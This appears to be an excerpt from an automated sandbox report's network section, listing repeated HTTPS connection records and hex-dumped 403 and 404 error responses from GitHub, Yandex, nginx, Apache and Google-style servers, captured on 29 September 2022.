          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49710
          Source: unknownNetwork traffic detected: HTTP traffic on port 49734 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49798
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49793
          Source: unknownNetwork traffic detected: HTTP traffic on port 49726 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49740 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49765 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49895 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49853 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49768 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49723 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49709
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49708
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49707
          Source: unknownNetwork traffic detected: HTTP traffic on port 49754 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49702
          Source: unknownNetwork traffic detected: HTTP traffic on port 49771 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49710 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49813 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49727 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49859 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49871 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49762 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49776 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49810 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49713 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49845 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49736 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49868 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49759 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49813
          Source: unknownNetwork traffic detected: HTTP traffic on port 49753 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49778
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49899
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49777
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49810
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49898
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49776
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49775
          Source: unknownNetwork traffic detected: HTTP traffic on port 49707 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49774
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49895
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49773
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49772
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49771
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49892
          Source: unknownNetwork traffic detected: HTTP traffic on port 49696 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49770
          Source: unknownNetwork traffic detected: HTTP traffic on port 49724 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49767 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49721 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49809
          Source: unknownNetwork traffic detected: HTTP traffic on port 49905 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49773 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49769
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49768
          Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49756 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49767
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49800
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49766
          Source: unknownNetwork traffic detected: HTTP traffic on port 49758 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49765
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49764
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49763
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49762
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49883
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49761
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49760
          Source: unknownNetwork traffic detected: HTTP traffic on port 49702 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49725 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49741 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49764 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49770 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49719 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49722 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49809 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49883 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49759
          Source: unknownNetwork traffic detected: HTTP traffic on port 49778 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49758
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49757
          Source: unknownNetwork traffic detected: HTTP traffic on port 49738 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49755 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49756
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49755
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49754
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49753
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49752
          Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49751
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49750
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49871
          Source: unknownNetwork traffic detected: HTTP traffic on port 49761 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49899 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49747 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49744 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49775 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49905
          Source: unknownNetwork traffic detected: HTTP traffic on port 49716 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49750 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49749
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49748
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49747
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49868
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49746
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49745
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: GitHub.comDate: Thu, 29 Sep 2022 12:45:34 GMTContent-Type: text/html; charset=utf-8Vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-WithCache-Control: no-cacheStrict-Transport-Security: max-age=31536000; includeSubdomains; preloadX-Frame-Options: denyX-Content-Type-Options: nosniffX-XSS-Protection: 0Referrer-Policy: no-referrer-when-downgradeExpect-CT: max-age=2592000, report-uri="https://api.github.com/_private/browser/errors"
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundAccept-CH: Viewport-Width, DPR, Device-Memory, RTT, Downlink, ECTAccept-CH-Lifetime: 31536000Cache-Control: no-cache,no-store,max-age=0,must-revalidateConnection: CloseContent-Length: 17424Content-Security-Policy-Report-Only: connect-src https://*.mc.yandex.ru https://adstat.yandex.ru https://mc.admetrica.ru https://mc.yandex.ru https://yabs.yandex.ru https://yandex.ru;default-src 'none';frame-src https://*.ya.ru https://*.yandex.ru https://mc.yandex.md https://mc.yandex.ru https://ya.ru https://yandex.ru;img-src 'self' data: https://*.mc.yandex.ru https://*.verify.yandex.ru https://*.ya.ru https://*.yandex.ru https://adstat.yandex.ru https://avatars.mds.yandex.net https://favicon.yandex.net https://mc.admetrica.ru https://mc.yandex.com https://mc.yandex.ru https://ya.ru https://yabs.yandex.ru https://yandex.ru https://yastatic.net;report-uri https://csp.yandex.net/csp?project=morda&from=morda.intercept404.ru&showid=1664455631.63025.98764.78996&h=stable-morda-any-sas-yp-12&yandexuid=4925462581664455631;script-src 'unsafe-inline' https://*.mc.yandex.ru https://adstat.yandex.ru https://mc.yandex.ru https://yandex.ru https://yastatic.net;style-src 'unsafe-inline' https://yastatic.netContent-Type: text/html; charset=UTF-8Date: Thu, 29 Sep 2022 12:47:11 GMTExpires: Thu, 29 Sep 2022 12:47:12 GMTLast-Modified: Thu, 29 Sep 2022 12:47:12 GMTNEL: {"report_to": "network-errors", "max_age": 100, "success_fraction": 0.001, "failure_fraction": 0.1}P3P: policyref="/w3c/p3p.xml", CP="NON DSP ADM DEV PSD IVDo OUR IND STP PHY PRE NAV UNI"Report-To: { "group": "network-errors", "max_age": 100, "endpoints": [{"url": "https://dr.yandex.net/nel", "priority": 1}, {"url": "https://dr2.yandex.net/nel", "priority": 2}]}Set-Cookie: i=Efg1OIX2vzI47rWXLKPVMq+V8jZiWcIdTpSkrYBxnXD9Up1BCxj+54DWUYkX8s0PO/0IYQAlWL5NjEZTnRflXyxFBKA=; Expires=Sat, 28-Sep-2024 12:47:11 GMT; Domain=.yandex.ru; Path=/; Secure; HttpOnlyVary: Cookie,Accept-Language,Accept-EncodingX-Content-Type-Options: nosniffX-XSS-Protection: 1; mode=block
          Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Thu, 29 Sep 2022 12:46:27 GMTContent-Type: text/htmlContent-Length: 146Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1596Date: Thu, 29 Sep 2022 12:47:03 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
          Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 29 Sep 2022 12:47:11 GMTServer: Apache/2.4.38 (Debian)Content-Length: 278Keep-Alive: timeout=1, max=100Connection: Keep-AliveContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 72 65 73 6f 75 72 63 65 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 33 38 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 37 38 2e 31 35 39 2e 39 37 2e 32 31 30 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access this resource.</p><hr><address>Apache/2.4.38 (Debian) Server at 78.159.97.210 Port 80</address></body></html>
          Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 29 Sep 2022 12:47:16 GMTServer: ApacheX-BP-NSA-REQID: (null) a.14UID=109X-Content-Type-Options: nosniffX-Frame-Options: sameoriginUpgrade: h2,h2cConnection: Upgrade, Keep-AliveLast-Modified: Sun, 21 Jun 2020 03:37:25 GMTETag: "1bbf-5a88fd839a740"Accept-Ranges: bytesContent-Length: 7103Vary: Accept-EncodingKeep-Alive: timeout=4, max=500Content-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 69 72 3d 22 6c 74 72 22 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 2c 63 68 72 6f 6d 65 3d 31 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 61 75 74 2d 68 6f 72 22 20 20 20 20 20 20 20 63 6f 6e 74 65 6e 74 3d 22 6d 69 72 6f 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 65 76 69 73 69 74 2d 61 66 74 65 72 22 20 63 6f 6e 74 65 6e 74 3d 22 33 20 64 61 79 73 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 20 20 20 20 20 20 20 63 6f 6e 74 65 6e 74 3d 22 4e 4f 49 4e 44 45 58 2c 20 46 4f 4c 4c 4f 57 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 20 20 20 20 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 68 65 69 67 68 74 3d 64 65 76 69 63 65 2d 68 65 69 67 68 74 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 2c 20 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 6e 6f 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 70 70 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 22 20 73 69 7a 65 73 3d 22 31 38 30 78 31 38 30 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 62 70 6c 61 63 65 64 2e 6e 65 74 2f 61 70 70 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 2e 70 6e 67 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 70 6e 67 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 62 70 6c 61 63 65 64 2e 6e 65 74 2f 66 61 76 69 63 6f 6e 2d 33 32 78 33 32 2e 70 6e 67 22 20 73 69 7a 65 73 3d 22 33 32 78 33 32 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 70 6e 67 22 20 68 72 65 66 3d 22 68 74 74
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1596Date: Thu, 29 Sep 2022 12:47:17 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1596Date: Thu, 29 Sep 2022 12:47:22 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 